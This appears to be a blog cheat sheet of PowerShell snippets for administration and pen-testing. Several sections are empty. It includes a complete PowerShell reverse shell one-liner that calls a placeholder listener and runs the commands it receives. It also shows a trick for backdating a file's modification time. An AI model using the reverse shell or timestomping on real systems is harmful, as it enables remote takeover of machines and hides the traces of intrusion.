PowerShell for Hackers

As I’m learning more PowerShell and dabbling in hacking, I will be compiling a list of techniques and scripts that I find very beneficial for administration and pen-testing.



System Running Processes


IP to Hostname


Lookup User Information

net user /domain jamie.bowman

Change File Modified Date and Time

(dir sample_file.txt).LastWriteTime = New-Object DateTime 1976,12,31

Find Apps Running on Port

# find pids listening on port 80
netstat -ano | findstr ":80"

# look up the pid reported by netstat (4 here; note that findstr matches any line containing "4")
tasklist | findstr "4"
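The same port-to-process lookup with native cmdlets instead of string matching on netstat/tasklist output, as an added example that is not part of the original post; it assumes Windows 8 / Server 2012 or later (Get-NetTCPConnection from the NetTCPIP module) and an elevated session if you want the image path of processes owned by other users.

```powershell
# Added example (not from the original post): resolve listening TCP ports to their
# owning process with Get-NetTCPConnection + Get-Process rather than netstat | findstr.
# Assumes Windows 8 / Server 2012 or later; run elevated to see other users' process paths.
function Get-ListeningProcess {
    [CmdletBinding()]
    param(
        # Restrict output to one local port; omit to list every listener.
        [int]$LocalPort
    )

    $conns = Get-NetTCPConnection -State Listen -ErrorAction Stop
    if ($PSBoundParameters.ContainsKey('LocalPort')) {
        # Exact match on the port, unlike findstr ":80" which also hits :800, :8080, ...
        $conns = $conns | Where-Object LocalPort -eq $LocalPort
    }

    foreach ($c in $conns) {
        # OwningProcess is the PID; PID 4 (System) and 0 are kernel-owned, so Path is $null there.
        $proc = Get-Process -Id $c.OwningProcess -ErrorAction SilentlyContinue
        [pscustomobject]@{
            LocalAddress = $c.LocalAddress
            LocalPort    = $c.LocalPort
            PID          = $c.OwningProcess
            ProcessName  = if ($proc) { $proc.ProcessName } else { '<unknown>' }
            Path         = if ($proc) { $proc.Path } else { $null }  # $null when access is denied
        }
    }
}

# Usage: everything listening on port 80, then all listeners sorted by port.
Get-ListeningProcess -LocalPort 80 | Format-Table -AutoSize
Get-ListeningProcess | Sort-Object LocalPort | Format-Table -AutoSize
```

A listener with an unexpected ProcessName or a Path outside the usual system and program directories is worth a closer look during a host review.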

Querying Databases


PowerShell Reverse Shells

powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('<LISTENERIP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"


PowerShell Frameworks & Tools

These are proven frameworks that can be used to reliably exploit a Windows environment.

Using Vim with PowerShell

First, you’ll need to install Vim. Download, run and install the file “gvim82.exe” (as of 02/06/2020)…


Once Vim is installed you’ll need to run PowerShell in Administrator mode to configure the integration.

# install
Install-Package -Name PSReadline -Force -SkipPublisherCheck

# create aliases
New-Alias -Name vi -Value 'C:\Program Files (x86)\vim\vim82\vim.exe'
New-Alias -Name vim -Value 'C:\Program Files (x86)\vim\vim82\vim.exe'

# vim edit mode
Set-PSReadlineOption -EditMode vi -BellStyle None

You can learn more from this article.